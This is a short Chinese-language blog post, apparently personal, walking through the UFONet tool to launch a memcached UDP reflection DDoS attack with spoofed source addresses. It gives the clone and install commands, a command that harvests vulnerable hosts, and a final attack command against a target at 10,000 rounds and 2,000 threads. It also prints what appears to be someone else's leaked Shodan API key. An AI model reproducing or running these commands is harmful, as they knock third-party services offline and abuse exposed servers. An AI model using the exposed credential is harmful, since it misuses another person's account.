这是一次差点蚀把米的过程啊,最后争议拿回了自己的手续费,白干了一场啊,真够倒霉的。

首先clone项目:

git clone https://github.com/epsylon/ufonet  

原理很清楚,通过memcache的漏洞,memcache居然是UDP的,伪造源地址,发一堆请求到有漏洞的memchache,引起反射攻击。

一堆有漏洞的机器从哪获得呢?这个韩国人真的有Shodan API,手榴弹? 他的账号,确实可以看到一堆有毛病的机器

0ptoLUtmkSJ8DbAvyZ8PevTRsyLoxEuN  

安装python:

wget https://www.python.org/ftp/python/2.7.14/Python-2.7.14.tgz  
tar zxvf Python-2.7.14.tgz  
cd Python-2.7.14  
./configure --prefix=/export/servers/Python2714
make  
make install

wget -O- "https://bootstrap.pypa.io/get-pip.py" | /export/servers/Python2714/bin/python


/export/servers/Python2714/bin/pip install pycurl
/export/servers/Python2714/bin/pip install geoip
/export/servers/Python2714/bin/pip install whois
/export/servers/Python2714/bin/pip install crypto
/export/servers/Python2714/bin/pip install request

先去拿一堆漏洞机器的列表

cd ufonet  
/export/servers/Python2714/bin/python ./ufonet --sd 'botnet/dorks.txt' --sa

轰击:

/export/servers/Python2714/bin/python ./ufonet./ufonet -a http://target.com -r 10000 --threads 2000
comments powered by Disqus